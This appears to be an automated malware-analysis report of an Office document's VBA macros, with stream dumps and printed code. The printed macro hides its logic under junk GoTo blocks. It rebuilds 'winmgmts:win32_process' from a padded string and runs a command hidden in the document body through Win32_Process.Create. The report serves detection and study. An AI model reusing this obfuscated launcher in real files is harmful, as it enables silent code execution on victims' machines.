                                                                                                                        'AEWPOk
                                                                                                                        pXLSUvXGL
                                                                                                                        dvGYxIO:
                                                                                                                        'XPjxk
                                                                                                                        'lXFZIIBa
                                                                                                                        DBkFIE:
                                                                                                                        'eBYmHoiBA
                                                                                                                        QHujBIJp
                                                                                                                        XwhzUcG
                                                                                                                        'OrIDw
                                                                                                                        'aDdbIADKD
                                                                                                                        'mlYhn
                                                                                                                        CAkSJ
                                                                                                                        'QlLDIAvHD
                                                                                                                        'aPJwL
                                                                                                                        FQNmffWt
                                                                                                                        'xoPwBUFsA
                                                                                                                        'xCaquG
                                                                                                                        'xODtDoIB
                                                                                                                        'XtrWMG
                                                                                                                        LSgRM:
                                                                                                                        FFWrACDoa
                                                                                                                        'hWWDUDGI
                                                                                                                        'bKUkGluT
                                                                                                                        JrBDIm
                                                                                                                        'GHJdfD
                                                                                                                        "eLPyC.ZdqCDyGC.QcmSHJFJl"
                                                                                                                        "sxxLaTTrF.HCwgq.ncoBz"
                                                                                                                        'NrwxFP
                                                                                                                        'jmKdCK
                                                                                                                        Rlclp:
                                                                                                                        PIypJ
                                                                                                                        lyHkDXIOH
                                                                                                                        GrdEGI
                                                                                                                        'xAmeRH
                                                                                                                        'kKrMDZI
                                                                                                                        'MnKMBVH
                                                                                                                        'JwNLmkpXF
                                                                                                                        'CPbAYBF
                                                                                                                        pbMAHF:
                                                                                                                        'gEdnXGAB
                                                                                                                        'FINeFJHJ
                                                                                                                        'bXsNnAIDE
                                                                                                                        zZMYCtCAX
                                                                                                                        "kLAOAG.wDTBF.VrHOCGc"
                                                                                                                        'hMgWcFF
                                                                                                                        SELjDEG:
                                                                                                                        GrdEGI:
                                                                                                                        nXQZvIEA:
                                                                                                                        pOumBJl:
                                                                                                                        'TJeBj
                                                                                                                        'ByOiG
                                                                                                                        'YiSwI
                                                                                                                        'yKykIcM
                                                                                                                        'FsOpdIsW
                                                                                                                        'tedmJhA
                                                                                                                        'VtriHBIDF
                                                                                                                        'DRUvDhBe
                                                                                                                        RntxcqJq
                                                                                                                        'ZUcAJ
                                                                                                                        'gyHcs
                                                                                                                        ZldpVI
                                                                                                                        "UHYrC.GZeVBEo.SOkEIBXGV"
                                                                                                                        'AlXCVHJ
                                                                                                                        'YEKPB
                                                                                                                        'CedXbS
                                                                                                                        rOzmqEAQ
                                                                                                                        cLvjGII
                                                                                                                        "VqHUG.ZFPuZgUK.BaCFC"
                                                                                                                        'BSjLEB
                                                                                                                        AnoQaAEA
                                                                                                                        RaTSTn
                                                                                                                        BTiPIcSF
                                                                                                                        'iWZQFE
                                                                                                                        mfYda
                                                                                                                        GLLJhAEHI
                                                                                                                        'IaDEIDpI
                                                                                                                        'EGGfGJEqE
                                                                                                                        WrCtJYU
                                                                                                                        "Xfyzv.AwqqF.CSulDx"
                                                                                                                        "xRrfF.YqkEzRF.kLUPqyCFD"
                                                                                                                        VrYJTkgJq
                                                                                                                        "zDQxMR.iplzr.wAjoodIF"
                                                                                                                        'pzbrdFE
                                                                                                                        pAOchCdIA
                                                                                                                        cZYJwJI
                                                                                                                        'BiIID
                                                                                                                        'yrXtA
                                                                                                                        'vAqxFfGB
                                                                                                                        "NhKoBJB.bXBco.DTUxEg"
                                                                                                                        yKflP:
                                                                                                                        "HDCkBsF.dMGCBEF.ufLRD"
                                                                                                                        'bXPvfYuDq
                                                                                                                        'EWHNBIiJN
                                                                                                                        ZXOpRLQFH
                                                                                                                        rtldCJ
                                                                                                                        'IPHiIjJHB
                                                                                                                        'WKjPM
                                                                                                                        'IgidHDSK
                                                                                                                        'kjvAuzEtF
                                                                                                                        'ScQwUADE
                                                                                                                        ZZTnc
                                                                                                                        String
                                                                                                                        MBalHjB
                                                                                                                        'LXLsCICF
                                                                                                                        "QrkQH.tOWCIP.GrDHUJ"
                                                                                                                        'sOIEJIDEW
                                                                                                                        'SEVxED
                                                                                                                        'HNYatJbe
                                                                                                                        'oYfRUCA
                                                                                                                        uweUHDE
                                                                                                                        'UyRrc
                                                                                                                        'vkuNGIJ
                                                                                                                        URTAHB:
                                                                                                                        OEleEeCT
                                                                                                                        "pDOcllCuD.lEzLut.kKCfGuBND"
                                                                                                                        iqyjE
                                                                                                                        'mmrHEDDH
                                                                                                                        UeTMXOrGT
                                                                                                                        'twZWbqGC
                                                                                                                        aopzzCP
                                                                                                                        'DDTfYJV
                                                                                                                        "FgtNVBC.LAhZJM.HJpZQ"
                                                                                                                        nbTgII:
                                                                                                                        "aCKLVJaH.XtEZlTZ.CLelFNHGI"
                                                                                                                        "LQAVC.FldzmI.oCeVXZC"
                                                                                                                        'cBNdBKA
                                                                                                                        'skRUOHGHq
                                                                                                                        "jGlnHJ.WuqlLbxyF.HGhglIF"
                                                                                                                        'VsSPJL
                                                                                                                        'oqezDBJ
                                                                                                                        URTAHB
                                                                                                                        'yubXaIh
                                                                                                                        'MAyDDBNI
                                                                                                                        EzJGE
                                                                                                                        BPUIP
                                                                                                                        KMpoSNLJ:
                                                                                                                        'TYAPZ
                                                                                                                        "EMnBm.qhzCjGG.AdplaCwr"
                                                                                                                        'OtsFHHIG
                                                                                                                        hBvQG
                                                                                                                        'wOOVDAGY
                                                                                                                        kydQU
                                                                                                                        'spWCdHBG
                                                                                                                        "qZLyIGBoG.pxIvxHQJ.ruafsIGOH"
                                                                                                                        Error
                                                                                                                        'cvsnImpIJ
                                                                                                                        'pFplgGAI
                                                                                                                        'OSjhX
                                                                                                                        RdYqcFDJ
                                                                                                                        Attribute
                                                                                                                        "FhCyJa.yKJBb.ijMMEFEqB"
                                                                                                                        'IfSdbRMm
                                                                                                                        Close
                                                                                                                        'eoYuBDfBv
                                                                                                                        Rlclp
                                                                                                                        'RvQwi
                                                                                                                        NmHsEFc
                                                                                                                        'jZarCE
                                                                                                                        'FpVuCCId
                                                                                                                        Function
                                                                                                                        'wdtaBI
                                                                                                                        khzFG:
                                                                                                                        XwhzUcG:
                                                                                                                        LokfC
                                                                                                                        LSgRM
                                                                                                                        'mZoyGC
                                                                                                                        'NDQyFF
                                                                                                                        "lzFAlTr.gioDBGHB.nAGbrAU"
                                                                                                                        'ykZBs
                                                                                                                        iJBKl
                                                                                                                        XkQTmpt
                                                                                                                        FkZyGrH
                                                                                                                        'PQvyIgI
                                                                                                                        'gJqSCzGP
                                                                                                                        hVZYKBKH:
                                                                                                                        'iFuweHbIH
                                                                                                                        "tMHiBAq.JuMHZKNBq.cgyJFF"
                                                                                                                        'eyDfDD
                                                                                                                        NQfbJHA:
                                                                                                                        'XTltBj
                                                                                                                        vaaYK
                                                                                                                        'opupRgM
                                                                                                                        'PbuDaDAZ
                                                                                                                        'wEBTBf
                                                                                                                        'fVXaBt
                                                                                                                        "DlhFJNHB.bhBvj.BSVeVFGRY"
                                                                                                                        "OstrD.remYG.TgODSiEJw"
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "T1f2hilsywf9dq"
Function Mrfzpndjp3s0k(Bnivj2ii9s31hmeej0)
   GoTo XwhzUcG
Dim pAYVi As String 'vZGyCMG
Dim BtpGqEA As String 'IfSdbRMm
Open "VVcDBJklB.wcffJ.HXsnGGAHN" For Binary As 247 'HHZcMPC
Put #247, , pAYVi 'nWlYeBII
Close #247 'oYfRUCA
XwhzUcG:
GoTo lyHkDXIOH
Dim flWCjiEl As String 'fcWToHE
Dim AoWWOyA As String 'iWZQFE
Open "emmJF.oEJjOD.giiLoEJv" For Binary As 168 'YmPlE
Put #168, , flWCjiEl 'MnKMBVH
Close #168 'HFWLG
lyHkDXIOH:
GoTo MPzbNgEEA
Dim cZYJwJI As String 'JmNAGIGpg
Dim kWOHB As String 'qhNOn
Open "aCKLVJaH.XtEZlTZ.CLelFNHGI" For Binary As 56 'AlXCVHJ
Put #56, , cZYJwJI 'OjVXMHwrH
Close #56 'IgidHDSK
MPzbNgEEA:
Mrfzpndjp3s0k = VBA.Replace (Bnivj2ii9s31hmeej0, "qq" + ")(s2)(", Owy08cjm2ufmu)
   GoTo WFNTzBZJ
Dim IbQUAAA As String 'vAqxFfGB
Dim iJBKl As String 'mZoyGC
Open "FhCyJa.yKJBb.ijMMEFEqB" For Binary As 152 'eyDfDD
Put #152, , IbQUAAA 'OrIDw
Close #152 'lXFZIIBa
WFNTzBZJ:
GoTo fYohsF
Dim wpmyAZDbH As String 'UvkYP
Dim UWnwUuJ As String 'vNbrJWXFs
Open "eLPyC.ZdqCDyGC.QcmSHJFJl" For Binary As 155 'HNYatJbe
Put #155, , wpmyAZDbH 'oqezDBJ
Close #155 'hjploJG
fYohsF:
GoTo vaaYK
Dim sgQCI As String 'eoYuBDfBv
Dim VqytEGCGP As String 'vkuNGIJ
Open "sVsyIHHN.BqamC.SasWG" For Binary As 143 'wEBTBf
Put #143, , sgQCI 'ykZBs
Close #143 'eBYmHoiBA
vaaYK:
End Function
Function Vj_abq1qp3rat9wz()
On Error Resume Next
sh2v = Ntx3xle2gjt1.StoryRanges.Item(1)
   GoTo suyzGICEH
Dim hlWxWgB As String 'pFplgGAI
Dim EzJGE As String 'xODtDoIB
Open "EMnBm.qhzCjGG.AdplaCwr" For Binary As 173 'kKrMDZI
Put #173, , hlWxWgB 'WKjPM
Close #173 'YEKPB
suyzGICEH:
GoTo cnPZICJpM
Dim WKGKGYA As String 'goxvtQ
Dim TpbnJRCA As String 'xAmeRH
Open "qZLyIGBoG.pxIvxHQJ.ruafsIGOH" For Binary As 171 'wOOVDAGY
Put #171, , WKGKGYA 'EGGfGJEqE
Close #171 'WPxoGFBuC
cnPZICJpM:
GoTo nXQZvIEA
Dim XkQTmpt As String 'PQEtNI
Dim BjSOooFXD As String 'uNzMTBa
Open "sxxLaTTrF.HCwgq.ncoBz" For Binary As 86 'AEWoE
Put #86, , XkQTmpt 'NDQyFF
Close #86 'BIJvaADA
nXQZvIEA:
sng2 = "qq)(s2)" + "(pqq)(s2)("
E_gr5d7gii7nk = "qq)(s2)(roqq" + ")(s2)(qq)(s2)(ceq" + "q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
   GoTo PtHzDC
Dim ufcruVvA As String 'OBuKICGCA
Dim TIucAHET As String 'wdtaBI
Open "OstrD.remYG.TgODSiEJw" For Binary As 130 'waqFE
Put #130, , ufcruVvA 'RIXfe
Close #130 'DwRUIBY
PtHzDC:
GoTo hBvQG
Dim LokfC As String 'AEWPOk
Dim XaCoFBkF As String 'twZWbqGC
Open "zaIoLA.TXEWrApGI.WoizH" For Binary As 239 'IZCOJ
Put #239, , LokfC 'qruEHBD
Close #239 'xMdFGb
hBvQG:
GoTo LSgRM
Dim mYHbrH As String 'wBmmODIas
Dim zMifH As String 'cBNdBKA
Open "QvCuBxUE.JkVTZJh.XniaV" For Binary As 196 'OUTVQNcP
Put #196, , mYHbrH 'OYgWDJ
Close #196 'Kufvu
LSgRM:
Ozms0qq3sojl = "qq)(s2)(:wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s2)(2qq" + ")(s2)(_qq)(s2)("
   GoTo hswrCJBk
Dim cLvjGII As String 'VwpCXLA
Dim AnoQaAEA As String 'MQFmHSAB
Open "wLbyGHRF.DHtWiADE.NZhmG" For Binary As 148 'ImBjDU
Put #148, , cLvjGII 'aRKWJBBIl
Close #148 'RvQwi
hswrCJBk:
GoTo jcwCemL
Dim UfERFpCEB As String 'mqLjGXcH
Dim PIypJ As String 'PRbiJE
Open "npKeJB.AsJFFIJ.PEOYbGOz" For Binary As 210 'YiSwI
Put #210, , UfERFpCEB 'zXveB
Close #210 'eCyDVgME
jcwCemL:
GoTo YeFQHW
Dim CLqtBBHEM As String 'cSOoJx
Dim mjcGEp As String 'WLoqEAAE
Open "Xfyzv.AwqqF.CSulDx" For Binary As 180 'zEBHCjA
Put #180, , CLqtBBHEM 'bXPvfYuDq
Close #180 'DujmQIHr
YeFQHW:
Nogf5r6twyl1 = "wqq)(s2)(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(t" + "qq)(s2)(qq)(s2)("
   GoTo GhPWABBAC
Dim PJctPBAG As String 'LXLsCICF
Dim pAOchCdIA As String 'CPbAYBF
Open "YPhnJPEH.HagGFmEIC.cyyfEHaR" For Binary As 238 'KBdNg
Put #238, , PJctPBAG 'OtsFHHIG
Close #238 'jmKdCK
GhPWABBAC:
GoTo ZJqvCII
Dim TyAVHBnfu As String 'rGZYAGA
Dim OEcMJ As String 'GWfMJkw
Open "UHYrC.GZeVBEo.SOkEIBXGV" For Binary As 165 'AjctARC
Put #165, , TyAVHBnfu 'VwqWBynDr
Close #165 'hMgWcFF
ZJqvCII:
GoTo nbTgII
Dim AtpoQEB As String 'ODJHAGEBR
Dim YEORYFEgD As String 'eOgqI
Open "aejsJk.ugJxod.tsCaOC" For Binary As 178 'pIoCjKh
Put #178, , AtpoQEB 'CjTuWXAF
Close #178 'VtriHBIDF
nbTgII:
Dha2d6vv7ph7ph_v = Zgw6mqlr7l2u51 + ChrW(Yp8t40c73pqf9j6 + wdKeyS + V0ds16izbsl_xm) + Eah7s5mir8k6q8
   GoTo pOumBJl
Dim ljRDIw As String 'TJeBj
Dim FkZyGrH As String 'pTXPAB
Open "lzFAlTr.gioDBGHB.nAGbrAU" For Binary As 216 'onwEG
Put #216, , ljRDIw 'PftIBSAvw
Close #216 'nxQwDJhLl
pOumBJl:
GoTo dvGYxIO
Dim qjEXJBwE As String 'XpVGACJB
Dim wylCIDDAH As String 'spWCdHBG
Open "DlhFJNHB.bhBvj.BSVeVFGRY" For Binary As 151 'BeGKBDhI
Put #151, , qjEXJBwE 'hZjGH
Close #151 'SEHbo
dvGYxIO:
GoTo BPUIP
Dim RntxcqJq As String 'RIxEqh
Dim RaTSTn As String 'BPXjtGAIo
Open "kLAOAG.wDTBF.VrHOCGc" For Binary As 141 'jttYD
Put #141, , RntxcqJq 'TGIyCPCt
Close #141 'LOwzHdS
BPUIP:
Ji67p3vs93zl9 = Nogf5r6twyl1 + Dha2d6vv7ph7ph_v + Ozms0qq3sojl + sng2 + E_gr5d7gii7nk
   GoTo VrYJTkgJq
Dim YenAEIAp As String 'fxyhXM
Dim UeTMXOrGT As String 'gEdnXGAB
Open "BbJaFjST.Xrzpku.uVfFAHQv" For Binary As 247 'UkbtPHpF
Put #247, , YenAEIAp 'yIpgX
Close #247 'CaHccmUPa
VrYJTkgJq:
GoTo LtmnvEE
Dim GfmhF As String 'kjvAuzEtF
Dim qiVZhCBpC As String 'fbVwYot
Open "AigvGEHIB.PPCtCYDWg.gBVHiqCD" For Binary As 103 'tedmJhA
Put #103, , GfmhF 'HpPiAJE
Close #103 'NvHuiCxB
LtmnvEE:
GoTo IWrPutAPf
Dim BTiPIcSF As String 'XTltBj
Dim FFWrACDoa As String 'LRtnIrEGf
Open "VLWvGECBE.hSxDGF.RmBdHqNjD" For Binary As 196 'UEeVHoE
Put #196, , BTiPIcSF 'LKuMAFDG
Close #196 'iSldRDWF
IWrPutAPf:
M1_71246hql8icmf = Y94cd7j9wr9jms(Ji67p3vs93zl9)
   GoTo hVZYKBKH
Dim yArxc As String 'CQcUlBY
Dim QHujBIJp As String 'rVQfbFK
Open "jGlnHJ.WuqlLbxyF.HGhglIF" For Binary As 260 'rzTvI
Put #260, , yArxc 'NqyUCa
Close #260 'aPJwL
hVZYKBKH:
GoTo PJxhq
Dim HojJPZ As String 'YDHVCICC
Dim NLiHLTcg As String 'BiIID
Open "DgRkGC.oezuIJ.QreJABJlU" For Binary As 126 'HLSxHFmB
Put #126, , HojJPZ 'WdtnHDFqJ
Close #126 'mmrHEDDH
PJxhq:
GoTo SELjDEG
Dim bqdcZF As String 'hYZyKCqA
Dim ZZTnc As String 'bXsNnAIDE
Open "KjXoEi.VPFBSHI.smiQyd" For Binary As 86 'FINeFJHJ
Put #86, , bqdcZF 'tzwDCH
Close #86 'XfuFHB
SELjDEG:
Set Jb9o1wbsdr9 = CreateObject(M1_71246hql8icmf)
   GoTo Rlclp
Dim IEMTiUEj As String 'FoPEe
Dim lYrlEWq As String 'hBmlufkDC
Open "GlzLdHXJB.ukgsrF.MzrWIEjI" For Binary As 120 'pfLrHfAD
Put #120, , IEMTiUEj 'sLTHHIdWW
Close #120 'ZLyvHz
Rlclp:
GoTo FIMZH
Dim VAZyEDXCR As String 'prwRBmAPJ
Dim iyQDTCBS As String 'VtpqX
Open "iPfhytE.BYjiXI.XRadQ" For Binary As 90 'qhIbwt
Put #90, , VAZyEDXCR 'PLFtB
Close #90 'gyHcs
FIMZH:
GoTo CAkSJ
Dim cHiYNHFqI As String 'oiKxBGHdG
Dim JrBDIm As String 'IPHiIjJHB
Open "MuBaJAqI.JJwbBIG.xcQNDHA" For Binary As 101 'KfzvA
Put #101, , cHiYNHFqI 'PhsrzJ
Close #101 'nmrXG
CAkSJ:
Bzj0r4l7ded = Mid(sh2v, (5), Len(sh2v))
   GoTo NmHsEFc
Dim zZMYCtCAX As String 'wTpIfC
Dim sutvLcBD As String 'pzbrdFE
Open "DGVxCZh.RlEFPCEb.wIwVQJJBo" For Binary As 135 'JwNLmkpXF
Put #135, , zZMYCtCAX 'jzyrJEO
Close #135 'MYcqCEL
NmHsEFc:
GoTo FQNmffWt
Dim VlqRGAP As String 'EWHNBIiJN
Dim eQxzwIAB As String 'XwQzzKI
Open "XBCgYJ.OzLWBT.wAQnUP" For Binary As 192 'PbuDaDAZ
Put #192, , VlqRGAP 'XxlPH
Close #192 'IaDEIDpI
FQNmffWt:
GoTo bsoyVGCFI
Dim yghyBIF As String 'rhJGP
Dim JGRXFCs As String 'xCaquG
Open "glqhDDI.CLTNCt.xZeqp" For Binary As 224 'skRUOHGHq
Put #224, , yghyBIF 'CgEsJ
Close #224 'gsWvFVBG
bsoyVGCFI:
   GoTo DBkFIE
Dim zAnUQGvFH As String 'rjhOF
Dim SfMUAAHuE As String 'HdkzJJ
Open "pDOcllCuD.lEzLut.kKCfGuBND" For Binary As 120 'GHJdfD
Put #120, , zAnUQGvFH 'MAyDDBNI
Close #120 'yrXtA
DBkFIE:
GoTo MBalHjB
Dim JQIjO As String 'miPErfKDG
Dim rtldCJ As String 'rHFMIEG
Open "ZVPyGDo.KHVpyJEJI.kpQfJeY" For Binary As 72 'yGoQlC
Put #72, , JQIjO 'uQuAGD
Close #72 'sOIEJIDEW
MBalHjB:
GoTo mMdMmt
Dim jCSEHHF As String 'yubXaIh
Dim GLLJhAEHI As String 'uxAOGU
Open "zDQxMR.iplzr.wAjoodIF" For Binary As 121 'jZarCE
Put #121, , jCSEHHF 'VsSPJL
Close #121 'FpVuCCId
mMdMmt:
Jb9o1wbsdr9.Create Y94cd7j9wr9jms(Bzj0r4l7ded), Jib98w2i8chhr, N4enanrrzm_ja
   GoTo GrdEGI
Dim OEleEeCT As String 'fVXaBt
Dim ZTXrGl As String 'zNzvOPGDA
Open "QrkQH.tOWCIP.GrDHUJ" For Binary As 191 'XdwIJh
Put #191, , OEleEeCT 'xNYzEIOEK
Close #191 'jXNDJFV
GrdEGI:
GoTo tzmsZ
Dim UWnPEFF As String 'opupRgM
Dim uRYMAlGHA As String 'TYgFHGIl
Open "LQAVC.FldzmI.oCeVXZC" For Binary As 181 'yJKoGGMCK
Put #181, , UWnPEFF 'UyRrc
Close #181 'QlIJBOHFE
tzmsZ:
GoTo NQfbJHA
Dim pXLSUvXGL As String 'YtYiEC
Dim yXjmE As String 'XPjxk
Open "xbtmGo.qIuZXGHJ.RZptvtQEG" For Binary As 127 'bxJMJC
Put #127, , pXLSUvXGL 'pXFOCJTDH
Close #127 'bKUkGluT
NQfbJHA:
   GoTo ZXOpRLQFH
Dim HmbOBrAAC As String 'iFuweHbIH
Dim ZSAiDINAr As String 'DghaBJ
Open "cRxbPCb.XykXFJGA.LtZggMsGa" For Binary As 103 'ExinpI
Put #103, , HmbOBrAAC 'VPxgCoxS
Close #103 'hVRsJCyE
ZXOpRLQFH:
GoTo mfYda
Dim iqyjE As String 'hWWDUDGI
Dim omutJ As String 'ffoEJA
Open "HoPXpGBA.IwHCJMDRA.CmlzH" For Binary As 82 'shuPKMcWG
Put #82, , iqyjE 'tuqaDL
Close #82 'YYMsAjcB
mfYda:
GoTo LZRViG
Dim CIXpj As String 'FsOpdIsW
Dim uweUHDE As String 'jiKjSA
Open "OECHJGADF.eWIOVB.CjlHH" For Binary As 170 'NrwxFP
Put #170, , CIXpj 'mlYhn
Close #170 'xoPwBUFsA
LZRViG:
End Function
Function Y94cd7j9wr9jms(Sdit1klsk_3t9o5mv)
On Error Resume Next
   GoTo pbMAHF
Dim ZPidFrt As String 'jqWJGRIDF
Dim rOzmqEAQ As String 'iwAgCMBM
Open "VqHUG.ZFPuZgUK.BaCFC" For Binary As 107 'ILEaPIEWu
Put #107, , ZPidFrt 'HEedAa
Close #107 'DDTfYJV
pbMAHF:
GoTo HZVSIIU
Dim diQYvIIAB As String 'qortGBHFE
Dim fRocABAt As String 'XtrWMG
Open "NhKoBJB.bXBco.DTUxEg" For Binary As 221 'PQoLBFA
Put #221, , diQYvIIAB 'KwXUfSFE
Close #221 'srKQHAJUg
HZVSIIU:
GoTo IOzIsOFA
Dim iMqHCHFJ As String 'CedXbS
Dim mKReIEI As String 'qVFxG
Open "tMHiBAq.JuMHZKNBq.cgyJFF" For Binary As 166 'AAbHHB
Put #166, , iMqHCHFJ 'zqGnII
Close #166 'zkyEFz
IOzIsOFA:
Ilf72gd2e5isgp_i = (Sdit1klsk_3t9o5mv)
   GoTo khzFG
Dim fVpImB As String 'LuADIGI
Dim CjlbH As String 'aDdbIADKD
Open "NuPRDAFC.UhBsmID.EkqPGFJEG" For Binary As 180 'jKGHAcDG
Put #180, , fVpImB 'mqsdenJm
Close #180 'QlLDIAvHD
khzFG:
GoTo KMpoSNLJ
Dim LxvXa As String 'QPOFBD
Dim ZMCcDFc As String 'FiXcEr
Open "qqPeDr.wSQVWc.pJeJCC" For Binary As 198 'PQvyIgI
Put #198, , LxvXa 'usesJGDt
Close #198 'aptRP
KMpoSNLJ:
GoTo kwwmA
Dim qgkvFbl As String 'NhgHBItrc
Dim JjteHBBVA As String 'KKQcfh
Open "FgtNVBC.LAhZJM.HJpZQ" For Binary As 126 'EWzTDA
Put #126, , qgkvFbl 'ljrRDq
Close #126 'tauleK
kwwmA:
J6sy08nwwbjsyvunu = Mrfzpndjp3s0k(Ilf72gd2e5isgp_i)
   GoTo yKflP
Dim TbyMA As String 'ScQwUADE
Dim uuXLMGBEg As String 'ZUcAJ
Open "ufMYp.QtEuJ.OwOyxH" For Binary As 132 'BSjLEB
Put #132, , TbyMA 'QpqEJ
Close #132 'zOlqpiBE
yKflP:
GoTo UcOAeq
Dim jzcemJ As String 'vhHjyA
Dim bTmHFI As String 'cvsnImpIJ
Open "HDCkBsF.dMGCBEF.ufLRD" For Binary As 157 'DXJjIaXwC
Put #157, , jzcemJ 'TYAPZ
Close #157 'BWcEdTac
UcOAeq:
GoTo kydQU
Dim MQmKFAAtE As String 'jsozCGAK
Dim ZldpVI As String 'evZsEG
Open "nOQNGhA.FYVFJ.bklIA" For Binary As 150 'yKykIcM
Put #150, , MQmKFAAtE 'gOnoJFf
Close #150 'WUTNECA
kydQU:
Y94cd7j9wr9jms = J6sy08nwwbjsyvunu
   GoTo URTAHB
Dim oqOQrACK As String 'QwSTRP
Dim fZLyN As String 'gJqSCzGP
Open "KmgdV.ZGtAJHtj.ONGSH" For Binary As 237 'tADwHZ
Put #237, , oqOQrACK 'nuuGL
Close #237 'ByOiG
URTAHB:
GoTo aopzzCP
Dim RjcPJ As String 'FgyIBEFDC
Dim RdYqcFDJ As String 'SEVxED
Open "MmewC.AVQUDGmHG.vtFSCPB" For Binary As 136 'OSjhX
Put #136, , RjcPJ 'rnAWH
Close #136 'HwfPAHH
aopzzCP:
GoTo eLkJvFE
Dim LwWkX As String 'cZkrDE
Dim WrCtJYU As String 'DRUvDhBe
Open "xRrfF.YqkEzRF.kLUPqyCFD" For Binary As 48 'XXZdqPuA
Put #48, , LwWkX 'lRHQDomqI
Close #48 'FFDZEEwAF
eLkJvFE:
End Function
                                                                                                                        VBA File Name: U2v6aydkxz3, Stream Size: 1163
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/U2v6aydkxz3
                                                                                                                        VBA File Name:U2v6aydkxz3
                                                                                                                        Stream Size:1163
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 80 b7 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "U2v6aydkxz3"
Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Y6lmxng9ukvy69c, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Y6lmxng9ukvy69c
                                                                                                                        VBA File Name:Y6lmxng9ukvy69c
                                                                                                                        Stream Size:1167
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 1b 11 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Y6lmxng9ukvy69c"
Attribute VB_Base = "0{E341BE8E-52D5-48DE-84A6-3AE19C883DEE}{F6993466-D5CC-4E31-AC79-155044703F1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Z4lx7rwdfqe, Stream Size: 1161
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Z4lx7rwdfqe
                                                                                                                        VBA File Name:Z4lx7rwdfqe
                                                                                                                        Stream Size:1161
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 95 34 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

